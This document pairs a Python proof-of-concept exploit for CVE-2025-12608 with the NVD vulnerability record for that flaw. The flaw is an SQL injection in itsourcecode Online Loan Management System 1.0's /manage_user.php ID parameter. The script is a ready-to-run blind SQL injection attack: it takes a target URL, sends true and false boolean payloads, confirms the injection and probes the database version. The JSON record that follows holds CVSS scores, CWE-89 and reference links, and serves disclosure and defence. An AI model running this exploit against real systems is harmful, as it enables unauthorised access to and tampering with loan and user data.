CVE-2025-12608

import requests import sys # CVE-2025-12608 SQL Injection PoC # Target: itsourcecode Online Loan Management System 1.0 # File: /manage_user.php # Parameter: ID def exploit_sqli(target_url, param_id): """ SQL Injection exploit for CVE-2025-12608 Tests for boolean-based blind SQL injection """ # Normal request baseline baseline_url = f"{target_url}/manage_user.php?id={param_id}" # Boolean-based blind SQL injection test # Extract database version using substring and comparison payloads = [ f"{param_id}' AND 1=1 -- -", # True condition f"{param_id}' AND 1=2 -- -", # False condition f"{param_id}' AND (SELECT SUBSTRING(@@version,1,1))='5' -- -", # MySQL 5.x ] print(f"[*] Target: {target_url}") print(f"[*] Testing SQL Injection on parameter ID: {param_id}") try: # Test true condition resp_true = requests.get(baseline_url.replace(str(param_id), payloads[0]), timeout=10) # Test false condition resp_false = requests.get(baseline_url.replace(str(param_id), payloads[1]), timeout=10) # Compare responses to confirm vulnerability if resp_true.status_code == 200 and resp_false.status_code != resp_true.status_code: print("[+] SQL Injection vulnerability confirmed!") print("[+] True condition returns different response than false condition") # Extract database version print("[*] Attempting to extract database version...") version_payload = f"{param_id}' AND (SELECT SUBSTRING(@@version,1,1))='5' -- -" resp_version = requests.get(baseline_url.replace(str(param_id), version_payload), timeout=10) if resp_version.status_code == resp_true.status_code: print("[+] Database appears to be MySQL 5.x") else: print("[-] SQL Injection test inconclusive") print(f"[*] Response codes - True: {resp_true.status_code}, False: {resp_false.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False return True if __name__ == "__main__": if len(sys.argv) > 2: target = sys.argv[1] param_id = sys.argv[2] exploit_sqli(target, param_id) else: print("Usage: python cve-2025-12608.py <target_url> <id_value>") print("Example: python cve-2025-12608.py http://target.com 1")

{"cve": {"id": "CVE-2025-12608", "sourceIdentifier": "[email protected]", "published": "2025-11-03T01:15:42.823", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in itsourcecode Online Loan Management System 1.0. The affected element is an unknown function of the file /manage_user.php. Performing manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:angeljudesuarez:online_loan_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "E9FED56B-4CFE-4A49-88D0-68A047A875C4"}]}]}], "references": [{"url": "https://github.com/cintahue/CVE/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?ctiid.330898", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330898", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678244", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}